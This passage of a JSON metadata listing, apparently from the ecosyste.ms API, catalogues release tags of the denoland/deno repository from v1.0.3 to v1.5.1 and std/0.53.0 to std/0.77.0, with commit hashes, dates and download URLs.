ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-